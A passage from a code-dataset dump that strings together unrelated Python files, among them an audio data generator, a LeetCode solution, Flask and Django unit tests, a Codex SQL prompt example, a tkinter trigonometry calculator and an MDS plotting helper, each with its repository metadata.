conduct_fe, conduct_augmentation\n\nORIGINAL = 'original'\n\n\nfrom ipdb import set_trace as st\n\n\nclass AudioGenerator(object):\n def __init__(self, root_dir, k, batch_size, train_or_valid, enhance):\n self.root_dir = root_dir\n self.k = k\n self.batch_size = batch_size\n self.train_or_valid = train_or_valid\n self.enhance = enhance\n self.ori_data = self.get_ori_data()\n self.aug_data = {}\n self.steps_per_epoch = len(self.ori_data['data']) // self.batch_size\n\n def load_pkl_data(self, path):\n return pickle.load(open(path, 'rb'))\n\n def get_ori_data(self):\n print('...Load original data begin')\n if self.train_or_valid=='train':\n path = self.root_dir + 'fold{0}/enhance{1}_train.pkl'.format(self.k, self.enhance)\n if self.train_or_valid=='valid':\n path = self.root_dir + 'fold{0}/valid.pkl'.format(self.k)\n data = self.load_pkl_data(path)\n if self.train_or_valid=='train':\n data['data'] = np.array(data['data'])\n if self.train_or_valid=='valid':\n data['data'] = conduct_fe(data['data'], SPEC)\n data['label'] = to_categorical(data['label'], n_classes)\n print('...Load original data done')\n return data\n\n def conduct_augmentation_each_epoch(self, data):\n return conduct_augmentation(data)\n\n def conduct_fe_each_epoch(self, data):\n return conduct_fe(data, SPEC)\n\n def generator(self):\n idx_range = list(range(len(self.ori_data['data'])))\n idx_max = len(self.ori_data['data']) - 1\n while 1:\n # Do shuffle\n random.shuffle(idx_range)\n\n # Do train epochs\n for offset in range(0, idx_max, self.batch_size):\n\n # batch index\n begin = offset\n end = offset + self.batch_size if (offset + self.batch_size) <= idx_max else idx_max\n\n # batch data and label\n batch_data = self.ori_data['data'][idx_range[begin:end]]\n batch_data = self.conduct_augmentation_each_epoch(batch_data)\n batch_data = self.conduct_fe_each_epoch(batch_data)\n batch_label = 
self.ori_data['label'][idx_range[begin:end]]\n\n # Reshape batch data and yield\n yield batch_data.reshape(tuple(list(batch_data.shape) + [1])).astype('float32'), batch_label\n","sub_path":"kaggle/audio-recognition/script/data_generator_enhance.py","file_name":"data_generator_enhance.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"412652346","text":"# APPROACH - Greedy Solution\n# Time Complexity : O(n), n: length of nums\n# Space Complexity : O(1)\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : None\n#\n#\n# Your code here along with comments explaining your approach\n# 1. Basically trying to see if the destination is reachable from any of the ind. Then it goes on till we check if soe ind is reachable from start\n# 2. Initially the destination is the last ind of nums. check from backwards if any of the ind, can be jumped from to rach this destination\n# 3. If so, then we update the destination to that ind and check from there backwards for any ind which can be jumped from to reach this new destination\n# 4. Keep doing this till you reach the destination as 0 (TRUE) or search ends at first index (FALSE)\n\nclass Solution:\n def canJump(self, nums: List[int]) -> bool:\n \n if nums is None or len(nums) < 1:\n return False\n \n destination = len(nums) - 1\n for ind in range(len(nums) - 2, -1, -1):\n if ind + nums[ind] >= destination:\n destination = ind\n \n if destination == 0:\n return True\n else:\n return False\n","sub_path":"Problem-1_Jump_Game.py","file_name":"Problem-1_Jump_Game.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"221752767","text":"from loginC import app\n\nfrom flask_principal import identity_loaded\nfrom test_helper import login,_on_principal_initL, logout, TEST_USER_LIDER, TEST_PASS_LIDER\nimport unittest\nimport datetime\nfrom test.test_helper import seleccionar_proyecto\n\nTODAY = datetime.date.today()\nPROYECTOID = 23\nnro_orden = 4\nnombre = 'TEST FASE 4'\ndescripcion = 'test fase 4 des'\nestado = 'I'\nfecha_inicio = TODAY\nfecha_fin = '2014-05-20'\nid_proyecto = PROYECTOID\nPATRON = nombre\nPARAM = 'nombre'\n\nclass FaseTestCase(unittest.TestCase):\n \"\"\"Clase que implementa los test para el caso de uso Fase.\"\"\"\n \n def setUp(self):\n \"\"\"se llama al metodo antes de iniciar el test\"\"\" \n self.client = app.test_client()\n self.acceso = login(self.client, TEST_USER_LIDER, TEST_PASS_LIDER)\n identity_loaded.connect(_on_principal_initL)\n self.proyse= seleccionar_proyecto(self.client, PROYECTOID)\n with app.test_client() as c:\n with c.session_transaction() as sess:\n sess['pry'] = PROYECTOID\n\n def tearDown(self):\n \"\"\" se llama al metodo al terminar el test\"\"\"\n self.salir = logout(self.client)\n\n#===============================================================================\n# def test_a_get_all_fases(self):\n# \"\"\"Prueba que verifica si se puede acceder al listado de fases\"\"\"\n# print '##----++++ PRUEBA UNITARIA FASE ++++----##'\n# print '+++ Obtener todas las fases +++'\n# request = self.client.get('/fase/administrarfase', follow_redirects=True)\n# self.assertNotIn('No posee los permisos suficientes para realizar la operacion', request.data, 'No tiene permisos para ver las fases')\n# self.assertEqual(request._status, '200 OK', 'Error al obtener las fases como '+ TEST_USER_LIDER)\n# print 
'*-- Obtiene todos las fases -- request result: ' + request._status + ' --*'\n# print'*---test 1 fase---*'\n# \n# def test_b_crear_fases(self): \n# \"\"\" Prueba de creacion de fase y verifica si la fase fue creada\"\"\"\n# print '+++ Creacion de fase +++'\n# request = self._crear_fase(nro_orden, nombre, descripcion, estado, fecha_inicio, fecha_fin, id_proyecto)\n# print '*-- datos de prueba ::: ' + str(nro_orden) + ', '+ nombre+', '+ descripcion+', ' +estado + ', ' + str(fecha_inicio) +', '+ str(fecha_fin) +', '+ str(id_proyecto) +' --*'\n# self.assertNotIn('No posee los permisos suficientes para realizar la operacion', request.data, 'No tiene permisos para crear fases')\n# self.assertNotIn('Error', request.data, 'Tiene errores el form')\n# self.assertIn('La fase ha sido registrada con exito', request.data, 'Error al crear la fase')\n# print '*-- request result: ' + request._status + ' --*'\n# self.assertIn(nombre, request.data, 'La fase creada no se encuentra en la tabla')\n# print '*-- '+nombre+' creada correctamente, aparece en la tabla de fases--*'\n# print '*---test 2 fase---*'\n# \n# def test_c_crear_fase_duplicado(self):\n# \"\"\"Prueba si se pueden crear fase duplicados\"\"\"\n# print '+++ Creacion de fase con mismo numero orden duplicado +++'\n# request = self._crear_fase(nro_orden, nombre, descripcion, estado, fecha_inicio, fecha_fin, id_proyecto)\n# print '*-- datos de prueba ::: ' + str(nro_orden) + ', '+ nombre+', '+ descripcion+', ' +estado + ', ' + str(fecha_inicio) +', '+ str(fecha_fin) +', '+ str(id_proyecto) +' --*'\n# self.assertNotIn('No posee los permisos suficientes para realizar la operacion', request.data, 'No tiene permisos para crear fases')\n# self.assertNotIn('Error', request.data, 'Tiene errores el form')\n# self.assertIn('Clave unica violada por favor ingrese otro NUMERO de Fase', request.data, 'Fase creada, no existe el numero de orden para la nueva fase')\n# self.assertIn(str(nro_orden), request.data, 'La fase creada no se encuentra en la tabla')\n# print '*-- Verificacion completa, no se pueden crear dos fases con el mismo numero de orden --*'\n# print '*---test 3 fase---*'\n# \n# def test_d_buscar_fase(self):\n# \"\"\"Prueba de busqueda de una fase\"\"\"\n# print '+++ Buscar una fase existente por nombre +++'\n# request = self._buscar_fase(PATRON, PARAM)\n# print '*-- datos de prueba ::: patron = '+ PATRON +', parametro = '+PARAM+' --*'\n# self.assertNotIn('Sin permisos para buscar fase', request.data, 'No tiene permisos para ver las fases')\n# self.assertNotIn('Sin registro de fases', request.data, 'No se encontro fases con dicho parametro')\n# self.assertIn(PATRON, request.data, 'La fase no existe en la tabla')\n# print '*-- Fase encontrada exitosamente --*'\n# print '*---test 4 fase---*'\n# \n# def test_e_editar_fase(self):\n# \"\"\" Prueba para editar una fase \"\"\" \n# print '+++ Edicion de fase +++'\n# request = self._editar_fase(nro_orden, nombre, 'decrip editada', estado, fecha_inicio, fecha_fin, id_proyecto)\n# print '*-- datos de prueba ::: ' + str(nro_orden) + ', '+ nombre+', '+ 'decrip editada'+', ' +estado + ', ' + str(fecha_inicio) +', '+ str(fecha_fin) +', '+ str(id_proyecto) +' --*'\n# self.assertNotIn('No posee los permisos suficientes para realizar la operacion', request.data, 'No tiene permisos para editar fases')\n# self.assertNotIn('Error', request.data, 'Tiene errores el form')\n# self.assertIn('La fase ha sido editada con exito', request.data, 'Error al editar la fase')\n# print '*-- request result: ' + request._status + ' --*'\n# 
self.assertIn(nombre, request.data, 'La fase creada no se encuentra en la tabla')\n# print '*-- '+nombre+' creada correctamente, aparece en la tabla de fases--*'\n# print '*---test 5 fase---*'\n# \n# def test_f_eliminar_fase(self):\n# \"\"\"Prueba de verificacion si se puede eliminar una fase\"\"\"\n# print '+++ Eliminacion de proyecto existente +++'\n# borrar_request = self._eliminar_fase(nro_orden)\n# print '*-- datos de prueba ::: numero orden = ' + str(nro_orden) +' --*'\n# self.assertNotIn('No posee los permisos suficientes para realizar la operacion', borrar_request.data, 'No tiene permisos para eliminar fases')\n# self.assertIn('La fase ha sido eliminado con exito', borrar_request.data, 'Fase creada, no existe el nro_oden fase')\n# self.assertNotIn(str(nombre), borrar_request.data, 'La fase no ha sido borrado')\n# print '*-- Verificacion completa, se elimino correctamente--*'\n# print '*---test 6 fase---*'\n# print '##----++++ FIN PRUEBA UNITARIA FASE ++++----##'\n#===============================================================================\n \n def _crear_fase(self, nro_orden=nro_orden, nombre=nombre, descripcion=descripcion, estado=estado, fecha_inicio=fecha_inicio,\n fecha_fin=fecha_fin, id_proyecto=id_proyecto): \n request = self.client.post('/fase/nuevafase', data=dict(\n nro_orden = nro_orden,\n nombre = nombre,\n descripcion = descripcion,\n estado = estado,\n fecha_inicio = fecha_inicio,\n fecha_fin = fecha_fin,\n id_proyecto = id_proyecto), follow_redirects=True)\n return request\n \n def _editar_fase(self, nro_orden=nro_orden, nombre=nombre, descripcion='decrip editada', estado=estado, fecha_inicio=fecha_inicio,\n fecha_fin=fecha_fin, id_proyecto=id_proyecto): \n request = self.client.post('/fase/editarfase', data=dict(\n nro_orden = nro_orden,\n nombre = nombre,\n descripcion = descripcion,\n estado = estado,\n fecha_inicio = fecha_inicio,\n fecha_fin = fecha_fin,\n id_proyecto = id_proyecto), follow_redirects=True)\n return request\n \n def _buscar_fase(self, patron = PATRON , parametro = PARAM ):\n request = self.client.get('/fase/buscarfase2?patron='+patron+'¶metro='+parametro+'&Buscar=Buscar', follow_redirects=True)\n return request\n\n def _eliminar_fase(self, nro_orden=nro_orden): \n request = self.client.post('/fase/eliminarfase?nro='+str(nro_orden), follow_redirects=True)\n return request\n \n def _get(self, url ='/fase/administrarfase'):\n \"\"\"obtiene la pagina administrar fases \"\"\"\n return self.client.get(url, follow_redirects=True)\n \nif __name__ == '__main__':\n unittest.main()","sub_path":"src/test/testfase.py","file_name":"testfase.py","file_ext":"py","file_size_in_byte":8475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"366834468","text":"import os\nimport openai\n\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\nresponse = openai.Completion.create(\n engine=\"davinci-codex\",\n prompt=\"### Postgres SQL tables, with their properties:\\n#\\n# Employee(id, name, department_id)\\n# Department(id, name, address)\\n# Salary_Payments(id, employee_id, amount, date)\\n#\\n### A query to list the names of the departments which employed more than 10 employees in the last 3 months\\nSELECT\",\n temperature=0,\n max_tokens=150,\n top_p=1.0,\n frequency_penalty=0.0,\n presence_penalty=0.0,\n stop=[\"#\", \";\"]\n)\n","sub_path":"sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} 
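The sql.py record above builds a Codex completion request but never reads the result; a minimal sketch, assuming the legacy openai.Completion response shape, of how the generated query could be recovered:
# hypothetical continuation of sql.py: the prompt ends with "SELECT" and generation
# stops at "#" or ";", so the full query is the prompt tail plus the completion text
generated_sql = "SELECT" + response["choices"][0]["text"]
print(generated_sql)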
+{"seq_id":"179447875","text":"from tkinter import *\r\nimport math\r\nfrom tkinter import messagebox\r\n\r\ndef run():\r\n \"\"\" () -> None\r\n\r\n Koristi se u glavnom programu za pokretanje ovog modula.\r\n \"\"\"\r\n def f_sin():\r\n \"\"\" () -> None\r\n\r\n Izračunava sinus zadanog koda\r\n \"\"\"\r\n global sin_print\r\n\r\n try:\r\n kut = float(kut_unos.get())\r\n except:\r\n kut=0\r\n try:\r\n min = float(min_unos.get())\r\n except:\r\n min=0\r\n try:\r\n sec = float(sec_unos.get())\r\n except:\r\n sec=0\r\n\r\n broj = (((sec/60) + min)/60) + kut\r\n\r\n if broj<=0 or broj>=90:\r\n messagebox.showwarning(\"Upozorenje\", \"Unesi mjeru kuta između 0 i 90\")\r\n\r\n else:\r\n\r\n vr = math.sin(math.radians(broj))\r\n vr = round(vr, 5)\r\n\r\n sin_print = Label(main, bg=\"grey\", fg=\"black\", font=\"arial 14 normal\", text=vr)\r\n sin_print.grid(row=2, column=1)\r\n\r\n kut_unos.configure(state=\"disabled\")\r\n min_unos.configure(state=\"disabled\")\r\n sec_unos.configure(state=\"disabled\")\r\n\r\n def f_cos():\r\n \"\"\" () -> None\r\n\r\n Izračunava kosinus zadanog koda\r\n \"\"\"\r\n global cos_print\r\n\r\n try:\r\n kut = float(kut_unos.get())\r\n except:\r\n kut=0\r\n try:\r\n min = float(min_unos.get())\r\n except:\r\n min=0\r\n try:\r\n sec = float(sec_unos.get())\r\n except:\r\n sec=0\r\n\r\n broj = (((sec / 60) + min) / 60) + kut\r\n\r\n if broj <= 0 or broj >= 90:\r\n messagebox.showwarning(\"Upozorenje\", \"Unesi mjeru kuta između 0 i 90\")\r\n\r\n else:\r\n\r\n vr = math.cos(math.radians(broj))\r\n vr = round(vr, 5)\r\n\r\n cos_print = Label(main, bg=\"grey\", fg=\"black\", font=\"arial 14 normal\", text=vr)\r\n cos_print.grid(row=3, column=1)\r\n\r\n kut_unos.configure(state=\"disabled\")\r\n min_unos.configure(state=\"disabled\")\r\n sec_unos.configure(state=\"disabled\")\r\n\r\n def f_tg():\r\n \"\"\" () -> None\r\n\r\n Izračunava tangens zadanog koda\r\n \"\"\"\r\n global tg_print\r\n\r\n try:\r\n kut = float(kut_unos.get())\r\n except:\r\n kut=0\r\n try:\r\n min = float(min_unos.get())\r\n except:\r\n min=0\r\n try:\r\n sec = float(sec_unos.get())\r\n except:\r\n sec=0\r\n\r\n broj = (((sec / 60) + min) / 60) + kut\r\n\r\n if broj <= 0 or broj >= 90:\r\n messagebox.showwarning(\"Upozorenje\", \"Unesi mjeru kuta između 0 i 90\")\r\n\r\n else:\r\n\r\n vr = math.tan(math.radians(broj))\r\n vr = round(vr, 5)\r\n\r\n tg_print = Label(main, bg=\"grey\", fg=\"black\", font=\"arial 14 normal\", text=vr)\r\n tg_print.grid(row=4, column=1)\r\n\r\n kut_unos.configure(state=\"disabled\")\r\n min_unos.configure(state=\"disabled\")\r\n sec_unos.configure(state=\"disabled\")\r\n\r\n def f_ctg():\r\n \"\"\" () -> None\r\n\r\n Izračunava kotangens zadanog koda\r\n \"\"\"\r\n global ctg_print\r\n\r\n try:\r\n kut = float(kut_unos.get())\r\n except:\r\n kut=0\r\n try:\r\n min = float(min_unos.get())\r\n except:\r\n min=0\r\n try:\r\n sec = float(sec_unos.get())\r\n except:\r\n sec=0\r\n\r\n broj = (((sec / 60) + min) / 60) + kut\r\n\r\n if broj <= 0 or broj >= 90:\r\n messagebox.showwarning(\"Upozorenje\", \"Unesi mjeru kuta između 0 i 90\")\r\n\r\n else:\r\n\r\n vr = 1 / (math.tan(math.radians(broj)))\r\n vr = round(vr, 5)\r\n\r\n ctg_print = Label(main, bg=\"grey\", fg=\"black\", font=\"arial 14 normal\", text=vr)\r\n ctg_print.grid(row=5, column=1)\r\n\r\n kut_unos.configure(state=\"disabled\")\r\n min_unos.configure(state=\"disabled\")\r\n sec_unos.configure(state=\"disabled\")\r\n\r\n def reset():\r\n \"\"\" () -> None\r\n\r\n Pritiskom na gumb unutar programa ponovno ga 
pokreće\r\n \"\"\"\r\n sin_print.destroy()\r\n cos_print.destroy()\r\n tg_print.destroy()\r\n ctg_print.destroy()\r\n\r\n kut_unos.configure(state=\"normal\")\r\n min_unos.configure(state=\"normal\")\r\n sec_unos.configure(state=\"normal\")\r\n\r\n\r\n main = Tk()\r\n\r\n main.title(\"Trigonometrija\")\r\n main.configure(bg=\"grey\")\r\n\r\n title = Label(main, bg=\"grey\", fg=\"black\", font=\"arial 18 bold\", text=\"Trigonometrija šiljastog kuta pravokutnog trokuta\")\r\n title.grid(row=0, columnspan=5)\r\n\r\n kut_text = Label(main, bg=\"grey\", fg=\"black\", font=\"arial 14 normal\", text=\"Unesi mjeru kuta:\")\r\n kut_text.grid(row=1, column=0)\r\n\r\n kut_unos = Entry(main)\r\n kut_unos.grid(row=1, column=1)\r\n\r\n min_unos = Entry(main)\r\n min_unos.grid(row=1, column=2)\r\n\r\n sec_unos = Entry(main)\r\n sec_unos.grid(row=1, column=3)\r\n\r\n sin = Button(main, text=\"Izračunaj sinus kuta\", command=f_sin)\r\n sin.grid(row=2, column=0)\r\n\r\n cos = Button(main, text=\"Izračunaj kosinus kuta\", command=f_cos)\r\n cos.grid(row=3, column=0)\r\n\r\n tg = Button(main, text=\"Izračunaj tangens kuta\", command=f_tg)\r\n tg.grid(row=4, column=0)\r\n\r\n ctg = Button(main, text=\"Izračunaj kotangens kuta\", command=f_ctg)\r\n ctg.grid(row=5, column=0)\r\n\r\n reset = Button(main, text=\"Ponovno pokretanje\", command=reset)\r\n reset.grid(row=6, column=5, sticky=E)\r\n\r\n main.mainloop()","sub_path":"trigonometrija.py","file_name":"trigonometrija.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"626506161","text":"import math\ndef count_inversions(A, p, r):\n if p < r:\n q = math.floor((p + r) / 2)\n left = count_inversions(A, p, q)\n right = count_inversions(A, q + 1, r)\n if left == None:\n left = 0\n if right == None:\n right = 0\n inversions = merge_inversions(A, p, q, r) + left + right\n return inversions\n\ndef merge_inversions(A, p, q, r):\n n1 = q - p + 1\n n2 = r - q\n L,R = [0]*(n1+1),[0]*(n2+1)\n for i in range(0,n1):\n L[i] = A[p + i]\n for j in range(0,n2):\n R[j] = A[q + j + 1]\n L[n1] = math.inf\n R[n2] = math.inf\n i = 0\n j = 0\n inversions = 0\n for k in range(p,r+1):\n if L[i] <= R[j]:\n A[k] = L[i]\n i = i + 1\n else:\n inversions = inversions + n1 - i\n A[k] = R[j]\n j = j + 1\n return inversions\n\na = [2,3,8,6,1]\nprint(count_inversions(a,0,len(a)-1))\n","sub_path":"2-Getting_Started/2-4-Count-Inversions.py","file_name":"2-4-Count-Inversions.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"115241862","text":"\"\"\"This an about tab\n\nworks as any other tab but contains text about the project, authors, etc.\n\"\"\"\n\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\n\nfrom tools.factories import jumbotron_from_title_paragraphs\nfrom data.markdowns import CONTRIBUTORS_MARKDOWN_TEXT, PROJECT_DETAILS_MARKDOWN\n\n\nj_title = 'Project name'\nj_text = ['Quick project description text']\nabout_jumbotron = jumbotron_from_title_paragraphs(j_title, j_text)\n\nproject_card = dbc.Card([\n dbc.CardHeader('Project details or something', className='lead'),\n dbc.CardBody(dcc.Markdown(PROJECT_DETAILS_MARKDOWN))\n])\n\n\ncontributors_card = dbc.Card([\n dbc.CardHeader('Contributors', className='lead'),\n dbc.CardBody(dcc.Markdown(CONTRIBUTORS_MARKDOWN_TEXT))\n])\n\n\n# tab container, which is imported by tabindex\n# 
divided in rows with dbc.Row()\n# rows typically one or many cards, split by cols\n# self contained cards may be placed in a separate file and imported\nabout_tab_layout = dbc.Container([\n    dbc.Row([\n        dbc.Col([\n            about_jumbotron,\n        ])\n    ]),\n\n    dbc.Row([\n        dbc.Col([project_card], width=6),\n        dbc.Col([contributors_card], width=3),\n        #dbc.Col([], width=1)\n    ], justify='around'),\n], fluid=True, id='example-tab')\n\n","sub_path":"dashapp/about/abouttab.py","file_name":"abouttab.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"654447959","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar  2 21:22:30 2014\n\n@author: atproofer\n\"\"\"\n\n# Author: Nelle Varoquaux \n# Licence: BSD\n#\n#print(__doc__)\nimport numpy as np\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib.collections import LineCollection\n\nfrom sklearn import manifold\nfrom sklearn.metrics import euclidean_distances\nfrom sklearn.decomposition import PCA\n\ndef plot_MDS_other(diff_matrix, n):\n    X_true = diff_matrix\n    similarities = euclidean_distances(diff_matrix)\n    seed = 1\n    \n\n    mds = manifold.MDS(n_components=n, max_iter=3000, eps=1e-9, random_state=seed,\n                   dissimilarity=\"precomputed\", n_jobs=1)\n    pos = mds.fit(similarities).embedding_\n    \n#    nmds = manifold.MDS(n_components=2, metric=False, max_iter=3000, eps=1e-12,\n#                        dissimilarity=\"precomputed\", random_state=2, n_jobs=1,\n#                        n_init=1)\n#    npos = nmds.fit_transform(similarities, init=pos)\n    \n    # Rescale the data\n    pos *= np.sqrt((X_true ** 2).sum()) / np.sqrt((pos ** 2).sum())\n#    npos *= np.sqrt((X_true ** 2).sum()) / np.sqrt((npos ** 2).sum())\n    \n    # Rotate the data\n    clf = PCA(n_components=2)\n    X_true = clf.fit_transform(X_true)\n    \n    pos = clf.fit_transform(pos)\n#    \n#    npos = clf.fit_transform(npos)\n    \n    fig = plt.figure(1)\n    ax = plt.axes([0., 0., 1., 1.])\n    \n    plt.scatter(X_true[:, 0], X_true[:, 1], c='r', s=20)\n    plt.scatter(pos[:, 0], pos[:, 1], s=20, c='g')\n    # the NMDS fit above is commented out, so npos is undefined here; plotting it would raise a NameError\n#    plt.scatter(npos[:, 0], npos[:, 1], s=20, c='b')\n    plt.legend(('True position', 'MDS'), loc='best')\n    \n    similarities = similarities.max() / similarities * 100\n    similarities[np.isinf(similarities)] = 0\n    \n    # Plot the edges\n    start_idx, end_idx = np.where(pos)\n    #a sequence of (*line0*, *line1*, *line2*), where::\n    #        linen = (x0, y0), (x1, y1), ... 
(xm, ym)\n segments = [[X_true[i, :], X_true[j, :]]\n for i in range(len(pos)) for j in range(len(pos))]\n values = np.abs(similarities)\n lc = LineCollection(segments,\n zorder=0, cmap=plt.cm.hot_r,\n norm=plt.Normalize(0, values.max()))\n lc.set_array(similarities.flatten())\n lc.set_linewidths(0.5 * np.ones(len(segments)))\n ax.add_collection(lc)\n \n plt.show()","sub_path":"hw5/editedMDS.py","file_name":"editedMDS.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"638871752","text":"# tuple_1 = ()\n# tuple_2 = (1,2,3,4,5)\n# tuple_3 = tuple(range(5,11))\n# tuple_4 = tuple('Python')\n# print(tuple_4[5])\n\ndict_1 = dict(one=1, two=2, three=3)\n# print(dict_1)\n\nb = {'one': 1, 'two': 2, 'three': 3}\n# print(b)\n\nd = dict([('two', 2), ('one', 1), ('three', 3)])\n# print(d)\n\ne = dict({'three': 3, 'one': 1, 'two': 2})\n# print(e)\n#\n# print(dict_1['one'])\n#\n# print(2 in d)\n# print('three' in d)\n\n# print(list(b.items()))\n#\n# # items = b.items()\n# # new_items = list(items)\n# # new_items.append(('four', 4))\n# # print(new_items)\n# # b = dict(new_items)\n# # print(b)\n# # b['five'] = 5\n# # print(b)\n# print(list(b.values()))\n# b.update( z = 3)\n# print(b)\nnumber_1 = 20\nnumber_2 = 40\ndef our_first_function(number):\n\n return number/ 2\n\n\n\n\n\n\nresult = our_first_function(number_1)\nprint(result)\n\n\n","sub_path":"Python day3.py","file_name":"Python day3.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"282960498","text":"# Implement a class to hold room information. This should have name and\n# description attributes.\nclass Room:\n def __init__(self, name, description, items=None, hidden=\"False\", locked=\"False\"):\n self.name = name\n self.description = description\n if items is None:\n self.contains = []\n else:\n self.contains = items\n self.n_to = None\n self.e_to = None\n self.s_to = None\n self.w_to = None \n self.hidden = hidden\n self.locked = locked\n # def __str__(self):\n # roomstr = f\"{self.name}\\n\\n\"\n # roomstr += f\" {self.description}\\n\\n\"\n # roomstr += f\"Possible directions: {self.get_exits()}\\n\"\n # return roomstr\n\n def get_items_str(self):\n return ' - '.join([str(i) for i in self.contains])\n\n # def get_exits(self):\n # hidden = []\n # exits = []\n # if self.n_to is not None:\n # if room[self.n_to].hidden == True:\n # hidden.append('N')\n # else:\n # exits.append('N')\n # if self.e_to is not None:\n # if room[self.e_to].hidden == True:\n # hidden.append('E')\n # else:\n # exits.append('E')\n # if self.s_to is not None:\n # if room[self.s_to].hidden == True:\n # hidden.append('S')\n # else:\n # exits.append('S')\n # if self.w_to is not None:\n # if room[self.w_to].hidden == True:\n # hidden.append('W')\n # else:\n # exits.append('W')\n # return \" | \".join(exits)\n\n def get_room_in_direction(self, direction):\n if direction == \"n\":\n return self.n_to\n elif direction == \"e\":\n return self.e_to\n elif direction == \"s\":\n return self.s_to\n elif direction == \"w\":\n return self.w_to\n else:\n return None\n\n def add_item(self, item):\n self.contains = []\n self.contains.append(item)","sub_path":"src/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"98215088","text":"import unittest\nimport decimal\n\nfrom 
auth.models import User\nfrom models import *\nfrom for_sale.models import Item\nfrom market.models import MarketPlace, MarketCategory, MarketSubCategory\nfrom shops.models import Shop\nfrom inventory.models import Product\nfrom preferences.models import TaxState, ShippingWeight, ShippingItem, ShippingPrice\n\nclass BuyItemTestCase(unittest.TestCase):\n \n def setUp(self):\n self.user = User.objects.create_user(\"test\", \"t@t.com\", \"testpw\")\n self.marketplace = MarketPlace(name=\"greatsomething\", title=\"Great Something\", slug=\"great-something\", \n template_prefix=\"default\", base_domain=\"greatsomething.com\")\n self.marketplace.save()\n self.shop = Shop(marketplace=self.marketplace, admin=self.user, name=\"test shop\")\n self.shop.save()\n self.category = MarketCategory(marketplace=self.marketplace, name=\"Category1\")\n self.category.save()\n self.subcategory = MarketSubCategory(marketplace=self.marketplace, parent=self.category, name=\"SubCategory1\")\n self.subcategory.save()\n self.cart = Cart(shop=self.shop, bidder=self.user)\n self.cart.save()\n \n \n def tearDown(self):\n self.user.delete()\n self.marketplace.delete()\n self.category.delete()\n self.subcategory.delete()\n# item.delete()\n \n def testCartMethods(self):\n item = Item(shop=self.shop, \n title=\"item\",\n description=\"an item\", \n price=\"10.0\", \n category=self.category, \n subcategory=self.subcategory, \n qty=5, \n weight=\"2.0\")\n item.save()\n \n \n shippingdata = ShippingData(street_address=\"Calle 8 n 182\", city=\"La Plata\", state=\"Buenos Aires\", zip=\"1900\", country=\"AR\")\n shippingdata.save()\n\n self.cart.shippingdata = shippingdata\n \n qty = item.qty\n #add an item to cart\n qty_to_buy = 2\n self.cart.add(item, item.price, qty=qty_to_buy)\n \n #check that qty item decrease in one unit\n self.assertEqual(qty, item.qty + qty_to_buy)\n \n #check that item is in cart\n cart_item = self.cart.cartitem_set.all()[0]\n self.assertEqual(item, cart_item.product)\n \n #check cart methods\n self.assertEqual(self.cart.total_items(), qty_to_buy)\n self.assertEqual(self.cart.total_weight() , decimal.Decimal(\"4.0\"))\n self.assertEqual(self.cart.total(), decimal.Decimal(\"20.0\"))\n self.assertEqual(self.cart.total_with_taxes(), decimal.Decimal(\"20.0\"))\n \n #clean the cart\n self.cart.clean()\n \n #recheck cart methods\n self.assertEqual(self.cart.total_items(), 0)\n self.assertEqual(self.cart.total_weight() , decimal.Decimal(\"0.0\"))\n self.assertEqual(self.cart.total(), decimal.Decimal(\"0.0\"))\n self.assertEqual(self.cart.total_with_taxes(), decimal.Decimal(\"0.0\"))\n \n \n def testTaxCalculation(self):\n item = Item(shop=self.shop, \n title=\"item\",\n description=\"an item\", \n price=\"10.0\", \n category=self.category, \n subcategory=self.subcategory, \n qty=5, \n weight=\"2.0\")\n item.save()\n \n #load some taxes \n miami_tax = decimal.Decimal(\"2.5\")\n tax_for_miami = TaxState(shop=self.shop, state=\"MI\", tax=miami_tax)\n tax_for_miami.save()\n \n ny_tax = decimal.Decimal(\"1.5\")\n tax_for_ny = TaxState(shop=self.shop, state=\"NY\", tax=ny_tax)\n tax_for_ny.save()\n \n #add an item to the cart\n self.cart.add(item, item.price, qty=1)\n \n #set the shipping address \n shippingdata = ShippingData(street_address=\"Abey Road\", city=\"Great Beach\", state=\"MI\", zip=\"11001\", country=\"US\")\n shippingdata.save()\n self.cart.shippingdata = shippingdata\n \n #check that tax is correctly calculated\n self.assertEquals(self.cart.taxes(), miami_tax * decimal.Decimal(item.price) / 
